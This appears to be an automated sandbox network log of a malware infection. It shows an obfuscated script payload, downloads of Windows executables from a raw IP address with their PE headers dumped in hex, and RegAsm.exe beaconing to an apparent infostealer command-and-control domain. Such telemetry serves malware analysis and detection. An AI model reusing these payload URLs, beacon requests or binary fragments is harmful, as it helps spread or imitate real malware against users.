                                                                                                                                                                                                              Data Ascii: $DTlprmibTRQQ10vbovRDk5VDMEmtOJHaEBGmTxPxUh1RIxOWkUkPldl7wicmzoVKKfMZTJSrfTjCEFuPq0JuZro1Q9pbU2x5UQG2loBaCs91ti2rnXv8f2lSqkJkUg6NVOiny23CZ8r6SV77Gyow6Zqr5obBfRQWWVFfAesWutJGbOA4MbdVsagwYqSKq1VHS5LvRs62F2CcPjQQoHoEdt3lfIRKWi527CnFDEMTFLQZ7Dhe9BVidS3YCZPIbVGXxaFNvLNju5z2dDOb1caUWmpP8YCdoEiiFs1wy3iYocnHTBlzLdgylmBLlpe6I9uqmQXkbRdxuM5izhw7dD2KYkxTqQLJoMQPhxWDdBXtAiE9QTMEtHtFGk1CSEtUG3JhvPABWttbf8JfgYC7EHPhSLIx5Tk9ICn69VdASKiAOSZ8alWuCWQyO1ZkGD6CIT2ckcGTkBPuYO3AlaXjxq7nmoSHwtuPegsupnnxfCJAFV9zyZy6fmERmfpvUyXrHAPiV8KynZDvh6h0PSJ7uX9rbaIJxrdheRtFGrcZOziQiIaPyZgBppxj0YHm0BBvlVQ0dbTXgjSueSJ2zsL7LcroUJeijqzNxn4WsKbXFSWG7CEIPfm8p4kJ51F3wbepjEwrnnapQo1sQlRSF63ED1X3DWq0EI04e5V3FNU1ExRBDrskKnY0I9mSg3o2wJkIXwOlYnNsLBzFKW0L2GPRjAWEiEmbZs4vNIeGdHWVa6OGahIUDcAqt3ZXbJCUBb2T6EsBhU7UktgNlO4Bv28mseBkiQ54EBWzDva5pGciFfFAmMcVfBY8Cg1rDHT1pCQi7hJqeyLoppgN8Bx6eJpCcmwV4i2hnLtCYX2FClhgp9jMANTBKmngNNGlkmVv54BewdoL8s4s1IMCDjVQZ06AYNoLQhUPZlKW8FQVZH3SSuOFADhB0G6FxAPjoduq7O2fxr4x3AqRxOi3yjKNzTpTPFX7p77mNckD29HJ8j8ZPOIj = 'dXaWR [TRUNCATED]
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704566002 CET1289INData Raw: 73 55 30 30 45 69 4a 43 37 67 6b 69 4e 79 4e 4c 6f 74 51 74 65 43 71 49 3d 27 0d 0a 24 6f 31 7a 63 59 47 6e 42 6c 55 66 59 30 36 52 50 51 49 37 48 49 5a 53 79 45 51 79 75 63 61 30 45 69 61 6e 63 4f 49 57 4d 4a 53 72 77 6e 6e 44 4b 49 31 45 58 54
                                                                                                                                                                                                              Data Ascii: sU00EiJC7gkiNyNLotQteCqI='$o1zcYGnBlUfY06RPQI7HIZSyEQyuca0EiancOIWMJSrwnnDKI1EXTniYIA8HItYLuafqifAImUyq8WKQNnlK5ClurY3OaOEPtgBNHM130waypsqnpRuUHNfsokzULm88PiwrTxIAWSk91mFy8gYSTjHfAJYVMHRdYBjGwy3sItzp3G0CfBm5YPP6bQqK8mnNAGK0DyB9N5JZkRMujWhLWl
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704685926 CET1289INData Raw: 4f 7a 64 72 61 34 78 36 33 71 72 6b 4c 75 55 38 6c 7a 62 55 31 44 52 68 52 36 32 61 66 46 6b 4b 42 4d 41 4b 4c 6f 36 4e 4a 75 4c 67 49 79 41 51 69 62 73 34 76 44 58 4b 69 77 61 44 42 56 72 58 46 68 6a 79 75 4b 56 78 33 58 4c 36 73 61 38 54 36 4d
                                                                                                                                                                                                              Data Ascii: Ozdra4x63qrkLuU8lzbU1DRhR62afFkKBMAKLo6NJuLgIyAQibs4vDXKiwaDBVrXFhjyuKVx3XL6sa8T6MrENQOxpp2PO2MmDnb1PCW8OvA8rqRHXQ7p4mJp2lIFhGiALY3FzGE3qSpSPgFz8WsxuVRQdlz3tQrHMzX2XMHQMEyLxr9lfJ6VOlGoHM1NHaaa1iGPTccWNbkqXFTmMNnkj4t0t8WKltJc3YjPlT2C6KJdAQ0BteB
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704710007 CET1289INData Raw: 57 75 79 74 77 72 47 54 75 31 4f 67 51 77 5a 49 63 43 54 4b 61 4a 54 46 64 44 33 79 4b 6a 52 69 69 75 78 67 6e 51 6f 6e 57 68 6c 75 68 35 70 52 68 6f 6c 74 57 51 6d 34 6d 6b 4c 41 63 64 61 54 2f 37 4b 6d 69 4b 4b 4c 46 62 2f 77 42 38 57 67 39 32
                                                                                                                                                                                                              Data Ascii: WuytwrGTu1OgQwZIcCTKaJTFdD3yKjRiiuxgnQonWhluh5pRholtWQm4mkLAcdaT/7KmiKKLFb/wB8Wg92VDXw5eqa4l0IYhDXoqWJkKVu0sV+UKUrdgVS5eYqUbdY36BRvofr9JZXPX4k+81twtzhsuHZipRa32yRf8CPBrwc8RgVEV8tmM04+PH2xkKtayCQE6H+xXqo/Q28Q1vWmEitYhgLQBw68D3u+0HGySIUT70OKbOur
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704735994 CET1289INData Raw: 47 6e 4b 39 4a 61 35 5a 39 6c 51 63 57 33 30 36 49 74 77 77 6e 35 55 38 4f 59 57 63 64 79 2f 73 75 56 66 45 48 56 6f 5a 43 6d 4d 6d 6f 67 69 35 73 57 38 6c 4d 32 5a 65 76 38 4e 61 46 7a 52 69 6f 4a 6f 30 44 79 59 4f 51 69 51 77 33 59 30 6a 64 55
                                                                                                                                                                                                              Data Ascii: GnK9Ja5Z9lQcW306Itwwn5U8OYWcdy/suVfEHVoZCmMmogi5sW8lM2Zev8NaFzRioJo0DyYOQiQw3Y0jdUK1Ssm/DjD9V8596XepkaqKpH/4grA8WQx5D+TlpO20EOWKK/f7t612T3H6tDXqkoKeaoyJoDCtybXuDvTLT5CbsC3cjJTrdk+6ncihYyYGDRYmvhcTXL2LPjnc1yaWqp2Sc55iudDYsoZQYP3Zr76Mab2dQs6Y0u5
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704762936 CET1289INData Raw: 4b 30 6c 5a 76 64 70 4c 39 57 48 44 71 4a 59 72 32 65 50 6f 71 78 47 48 54 46 65 49 4b 73 72 73 4b 4c 61 6b 6f 58 46 46 69 39 4e 6f 6e 4b 69 34 58 30 42 6c 42 74 7a 4e 54 64 47 70 7a 67 42 67 34 50 74 66 38 64 44 45 38 4b 47 51 6b 53 55 49 58 4b
                                                                                                                                                                                                              Data Ascii: K0lZvdpL9WHDqJYr2ePoqxGHTFeIKsrsKLakoXFFi9NonKi4X0BlBtzNTdGpzgBg4Ptf8dDE8KGQkSUIXKkjqFqRMX0KRPGB86U7RDvkXxMrnj3BTx1pwRqYZc3LMsmTEEhNxmrUOAWtsz42uZrUnRFQgwIfak74KtniCPD6GHavvx5ZIAQnB25my07BeLk43rizLl0fWUOghJWi0i793j3hYAkbhCsuVF2EO5NV9b1hOoFpFoa
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704771042 CET1289INData Raw: 67 7a 41 56 45 4f 62 53 56 51 6d 35 43 35 34 35 76 6f 7a 55 79 34 57 58 4d 45 6f 67 51 70 78 49 63 6b 46 63 72 67 74 79 7a 69 38 59 4f 31 71 76 30 67 43 47 56 66 62 4d 65 64 4b 41 5a 76 42 36 53 64 74 52 5a 73 64 4f 75 41 57 51 76 78 49 6b 4f 74
                                                                                                                                                                                                              Data Ascii: gzAVEObSVQm5C545vozUy4WXMEogQpxIckFcrgtyzi8YO1qv0gCGVfbMedKAZvB6SdtRZsdOuAWQvxIkOtPamrmwJtxO6t8DgCFa8857CoMWTUQg40m5f0j1rwI5uZiB1R9tr7LfYi8yf1dodQjGHDYPSdjbZAcdGLtBlVpwOGHxslm0TUsdfbtYtTbNoaQXFvs47bDQ1nrAv0V6rTSFIyx4R4H1kbIeqjrxtSshQbMsjt33xEV
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704803944 CET1289INData Raw: 4d 63 56 66 42 59 38 43 67 31 72 44 48 54 31 70 43 51 69 37 68 4a 71 65 79 4c 6f 70 70 67 4e 38 42 78 36 65 4a 70 43 63 6d 77 56 34 69 32 68 6e 4c 74 43 59 58 32 46 43 6c 68 67 70 39 6a 4d 41 4e 54 42 4b 6d 6e 67 4e 4e 47 6c 6b 6d 56 76 35 34 42
                                                                                                                                                                                                              Data Ascii: McVfBY8Cg1rDHT1pCQi7hJqeyLoppgN8Bx6eJpCcmwV4i2hnLtCYX2FClhgp9jMANTBKmngNNGlkmVv54BewdoL8s4s1IMCDjVQZ06AYNoLQhUPZlKW8FQVZH3SSuOFADhB0G6FxAPjoduq7O2fxr4x3AqRxOi3yjKNzTpTPFX7p77mNckD29HJ8j8ZPOIj, $o1zcYGnBlUfY06RPQI7HIZSyEQyuca0EiancOIWMJSrwnnDKI
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704811096 CET1289INData Raw: 43 74 70 49 57 62 37 64 36 67 6b 69 66 39 6a 61 64 72 7a 62 39 77 77 31 4e 50 44 6b 67 73 46 47 31 45 6d 56 72 4b 49 4f 31 6f 31 6c 61 74 70 6a 36 35 64 49 74 5a 4b 47 77 59 76 47 38 6d 77 65 61 64 52 62 6e 58 6a 32 69 6c 4a 6c 35 4c 71 54 30 54
                                                                                                                                                                                                              Data Ascii: CtpIWb7d6gkif9jadrzb9ww1NPDkgsFG1EmVrKIO1o1latpj65dItZKGwYvG8mweadRbnXj2ilJl5LqT0TOLOxNBug02PCgfsnLxcOwJlL0HQZal8cgO7lZdZPgGxQNfE4tiAsgMXFZD6Gl4FeucV2HHX78X7pM4xkDm5skfv4q2WVGT4MBSVaTcVmU2UTe8suFmCzyMuOhsbflB1OtWnuIV10Zj8SUbpR90QUQ4NoXHt1BgATA
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704818010 CET1289INData Raw: 78 54 71 51 4c 4a 6f 4d 51 50 68 78 57 44 64 42 58 74 41 69 45 39 51 54 4d 45 74 48 74 46 47 6b 31 43 53 45 74 55 47 33 4a 68 76 50 41 42 57 74 74 62 66 38 4a 66 67 59 43 37 45 48 50 68 53 4c 49 78 35 54 6b 39 49 43 6e 36 39 56 64 41 53 4b 69 41
                                                                                                                                                                                                              Data Ascii: xTqQLJoMQPhxWDdBXtAiE9QTMEtHtFGk1CSEtUG3JhvPABWttbf8JfgYC7EHPhSLIx5Tk9ICn69VdASKiAOSZ8alWuCWQyO1ZkGD6CIT2ckcGTkBPuYO3AlaXjxq7nmoSHwtuPegsupnnxfCJAFV9zyZy6fmERmfpvUyXrHAPiV8KynZDvh6h0PSJ7uX9rbaIJxrdheRtFGrcZOziQiIaPyZgBppxj0YHm0BBvlVQ0dbTXgjSue
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.905092955 CET1289INData Raw: 64 71 73 30 72 30 36 4a 71 57 65 30 32 46 62 68 31 61 62 72 54 55 73 55 45 5a 39 74 7a 35 32 6a 6c 68 74 56 47 6c 6f 4a 58 31 58 72 38 32 4e 34 74 72 4b 4f 44 52 44 53 79 37 57 31 71 63 4b 57 73 76 65 6b 4c 50 62 66 6c 32 34 72 78 41 6d 62 4d 46
                                                                                                                                                                                                              Data Ascii: dqs0r06JqWe02Fbh1abrTUsUEZ9tz52jlhtVGloJX1Xr82N4trKODRDSy7W1qcKWsvekLPbfl24rxAmbMFAHUOg3ebY8ZVSlRCzdn2SeP52bmLWxlkPkbCAdOLGaqDPYJj9vAJnjmVsplFg2Q0nfH7JPBWYcVinMPE1DbZxcw6yPKKsJ4dU0PaRc9UtekKVE8fahedrq2Lib9uEq3PIjYVwfno3R5TrmJtg4aK5qm3yErfCfPDK
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.449738979 CET155OUTGET /infopage/hdt.exe HTTP/1.1
                                                                                                                                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                                                                                                                              Host: 147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.639450073 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:11 GMT
                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 18:13:46 GMT
                                                                                                                                                                                                              ETag: "b000-626427a8e8d36"
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Content-Length: 45056
                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 3e 9d 93 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0a 00 00 00 00 00 00 6a c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c3 00 00 4f 00 00 00 00 e0 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 fc c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>"0j @ `O H.textp `.rsrc@@.reloc@BLH"h0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0c(!o"iYpai +'aao# [TRUNCATED]
                                                                                                                                                                                                              Nov 7, 2024 17:55:11.909343958 CET156OUTGET /infopage/tbg9.exe HTTP/1.1
                                                                                                                                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                                                                                                                              Host: 147.45.44.131
                                                                                                                                                                                                              Nov 7, 2024 17:55:12.108319044 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:12 GMT
                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 18:11:21 GMT
                                                                                                                                                                                                              ETag: "4c200-6264271ea9617"
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Content-Length: 311808
                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL3%g@@80@<A1.textZ `.rdata]%&@@.datap@^"@.reloc<A@B@B [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              1192.168.11.2049740142.251.32.9980
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.619442940 CET200OUTGET /r/r1.crl HTTP/1.1
                                                                                                                                                                                                              Cache-Control: max-age = 3000
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                              User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                              Host: c.pki.goog
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.722769976 CET222INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:48:06 GMT
                                                                                                                                                                                                              Expires: Thu, 07 Nov 2024 17:38:06 GMT
                                                                                                                                                                                                              Age: 456
                                                                                                                                                                                                              Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                              Cache-Control: public, max-age=3000
                                                                                                                                                                                                              Vary: Accept-Encoding


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.11.2049711104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:14 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                              2024-11-07 16:55:14 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:14 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=2fvkk5ig5jmu7tdrhdlgehijit; expires=Mon, 03-Mar-2025 10:41:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=586RlBz7kLJ4b8okh8EM6Pbrl%2FlOzu32CmNE3wgFTXNfYUZhXSKOokJPlbbUHXnCZ0HOSP0GDoQWzuUTygTXIzVUbbvTgG3G6zsUSfwFIXWM47%2FG0VIu3VQWnbD10Kn76y5t"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed98b1bcf4240-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=103679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=36526&cwnd=252&unsent_bytes=0&cid=2e8a3c6c91508dfd&ts=535&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                              2024-11-07 16:55:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.11.2049712104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 81
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC81OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@topgcr&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC1006INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:15 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=f5hpur29j2d57bo9o0c35kcd1q; expires=Mon, 03-Mar-2025 10:41:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLw%2Ft2Q42f9QynleciW08XcxAzDMfmSJHVdmwsS5X%2F0m4b1BZlV3Qxqfe6CIasjEj1DvRNOtf1T2K8Hx7aPQeX%2FRLABCRSKKzmm8lOSV0Xuplfnm5Ah0MJNdBe2PKk7M5eED"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed990797f59a3-IAD
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=108794&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=981&delivery_rate=35109&cwnd=63&unsent_bytes=0&cid=3aeac78aedaa84f9&ts=859&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC363INData Raw: 31 64 39 30 0d 0a 74 2f 2b 4a 31 6f 77 4b 4f 52 74 4c 39 37 79 6d 6d 38 39 36 63 7a 33 42 75 65 32 7a 68 6b 6e 43 75 54 33 30 72 68 4e 72 77 6f 54 4d 33 66 2f 30 74 6a 34 56 4f 54 69 53 6e 70 7a 39 72 68 59 41 57 4f 32 62 6a 4e 65 6b 63 36 54 59 55 59 66 4c 50 30 6d 30 36 5a 58 46 37 37 66 67 65 56 77 33 61 5a 4c 45 68 4b 47 55 41 56 46 59 72 35 76 58 6b 65 4d 6a 6f 4e 68 52 6c 73 39 34 42 4c 4c 6f 31 4a 66 6c 73 65 52 76 57 6e 38 71 6d 39 48 44 2f 71 6f 62 47 56 4f 6f 31 49 58 65 70 47 58 67 33 45 66 57 6c 44 45 6d 70 2f 44 57 73 75 69 6c 35 79 68 45 4e 7a 44 56 32 63 69 35 39 56 67 53 57 4b 50 56 69 39 66 74 49 61 72 52 57 5a 66 4b 65 52 75 72 34 74 2b 58 36 37 4c 6c 5a 56 4e 72 4a 35 48 57 79 50 69 67 47 31 45 52 34 39 79 58 6b 62 78 72 38 2b 6c 63 68
                                                                                                                                                                                                              Data Ascii: 1d90t/+J1owKORtL97ymm896cz3Bue2zhknCuT30rhNrwoTM3f/0tj4VOTiSnpz9rhYAWO2bjNekc6TYUYfLP0m06ZXF77fgeVw3aZLEhKGUAVFYr5vXkeMjoNhRls94BLLo1JflseRvWn8qm9HD/qobGVOo1IXepGXg3EfWlDEmp/DWsuil5yhENzDV2ci59VgSWKPVi9ftIarRWZfKeRur4t+X67LlZVNrJ5HWyPigG1ER49yXkbxr8+lch
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC1369INData Raw: 2f 79 2f 45 78 68 53 72 74 75 43 32 2b 73 6f 6f 4e 78 56 6e 4d 4e 37 44 61 33 72 30 35 33 72 39 4b 41 6f 58 47 46 70 7a 5a 37 6e 2f 4c 30 66 48 55 6e 68 34 63 2f 4f 71 6a 4c 67 33 46 50 57 6c 44 45 42 70 65 58 57 6c 75 53 33 35 6d 4e 4a 65 54 75 54 30 38 48 72 71 78 30 66 56 61 44 4a 68 64 2f 69 4b 4b 6e 51 56 70 50 4c 64 55 6e 75 70 74 4b 46 71 2b 79 75 53 56 5a 79 4a 5a 2f 4a 78 4c 6d 79 56 67 67 66 70 4e 66 50 69 61 51 76 6f 64 39 65 6b 73 4a 2f 44 61 7a 67 32 35 44 6b 73 75 52 6f 58 48 4d 68 6e 64 2f 4a 38 71 49 59 46 46 4b 6e 33 59 50 51 34 57 76 75 6d 31 69 4f 6a 43 6c 4a 6a 75 48 57 6a 36 6d 42 37 57 5a 56 66 6a 2f 56 77 59 72 67 37 52 38 64 48 2f 75 62 67 64 54 72 4f 61 48 4a 57 70 6a 65 66 51 79 6d 36 39 61 54 36 37 48 70 5a 56 56 2f 4c 70 62 57
                                                                                                                                                                                                              Data Ascii: /y/ExhSrtuC2+sooNxVnMN7Da3r053r9KAoXGFpzZ7n/L0fHUnh4c/OqjLg3FPWlDEBpeXWluS35mNJeTuT08Hrqx0fVaDJhd/iKKnQVpPLdUnuptKFq+yuSVZyJZ/JxLmyVggfpNfPiaQvod9eksJ/Dazg25DksuRoXHMhnd/J8qIYFFKn3YPQ4Wvum1iOjClJjuHWj6mB7WZVfj/VwYrg7R8dH/ubgdTrOaHJWpjefQym69aT67HpZVV/LpbW
                                                                                                                                                                                                              2024-11-07 16:55:15 UTC1369INData Raw: 38 64 48 2f 75 62 67 39 6a 6b 49 4b 72 66 58 35 48 42 64 41 71 6e 35 64 69 61 34 62 72 70 62 46 64 77 4a 4a 50 65 77 2f 32 6f 43 68 52 57 72 39 66 50 6e 36 51 73 75 4a 73 48 31 75 4e 32 48 36 50 4a 31 6f 7a 69 39 50 45 6d 51 6a 6b 75 6d 5a 36 63 75 61 6f 64 47 56 53 6c 30 34 2f 44 34 53 57 72 32 6c 57 51 7a 58 77 46 70 75 62 55 6e 65 32 34 37 6d 39 63 61 7a 75 51 32 4e 62 7a 37 56 5a 52 57 4c 75 62 31 35 48 53 4f 37 66 4b 53 64 54 35 63 67 65 75 34 63 50 64 39 50 72 33 4b 46 78 31 61 63 32 65 7a 2f 6d 68 48 78 6c 5a 70 39 4f 41 33 75 30 35 6f 64 64 52 68 4d 74 78 41 4b 37 70 32 5a 54 6d 73 2b 4e 6a 55 58 51 74 6b 74 2b 45 74 2b 30 66 43 52 2f 37 6d 37 6e 42 36 53 65 4f 30 46 4f 66 6a 47 35 48 75 61 62 53 6b 61 76 73 72 6d 78 58 63 53 4f 61 31 38 37 7a 6f
                                                                                                                                                                                                              Data Ascii: 8dH/ubg9jkIKrfX5HBdAqn5dia4brpbFdwJJPew/2oChRWr9fPn6QsuJsH1uN2H6PJ1ozi9PEmQjkumZ6cuaodGVSl04/D4SWr2lWQzXwFpubUne247m9cazuQ2Nbz7VZRWLub15HSO7fKSdT5cgeu4cPd9Pr3KFx1ac2ez/mhHxlZp9OA3u05oddRhMtxAK7p2ZTms+NjUXQtkt+Et+0fCR/7m7nB6SeO0FOfjG5HuabSkavsrmxXcSOa187zo
